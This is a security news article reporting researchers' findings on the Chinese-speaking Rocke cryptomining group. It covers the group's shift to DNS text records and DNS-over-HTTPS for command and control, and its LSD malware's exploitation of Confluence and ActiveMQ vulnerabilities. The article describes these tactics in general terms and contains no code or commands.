Chinese-speaking cybercrime group Rocke, which is believed to be responsible for several large-scale cryptomining campaigns in past, is now using new Tactics, Techniques, and Procedures (TTPs), including new C2 infrastructure and updated malware in order to evade detection.
First reports on group’s illicit cryptomining operations emerged in August 2018, when Rocke attacked unpatched Apache Struts, Oracle WebLogic, and Adobe ColdFusion servers and infected compromised servers with cryptomining malware. Earlier this year researchers from Palo Alto Networks Unit42 discovered new malware samples used by the hackers for cryptojacking that uninstall from Linux servers cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud. In March, the threat actor was using a dropper dubbed LSD that was controlled via Pastebin, but this summer Rocke has switched to a new Command and Control (C2) infrastructure moving away from Pastebin in favor of a self-hosted solution, according to researchers from cybersecurity outfit Anomaly.
“In September 2019, the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (DoH) if the DNS query fails,” the experts said. The use of self-hosted and DNS records makes it hard to detect the group’s malicious operations and takedowns, they added.
In the previous campaigns the Rocke group was observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners, but recently the attackers added a new functionality to their LSD malware to exploit ActiveMQ servers vulnerable to CVE-2016-3088. CVE-2016-3088 is a vulnerability in ActiveMQ that can allow uploading of an arbitrary file.
To ensure that only its cryptomining malware runs on the infected host, the group tries to terminate all other processes with high CPU usage. The LSD malware identifies its miner via the MD5 hash of the file to make sure it doesn’t kill its miner.
“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity. It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future,” the researchers concluded.
Additional details about Rocke’s activity, including Indicators of Compromise (IoCs) are available in the Anomaly blog post.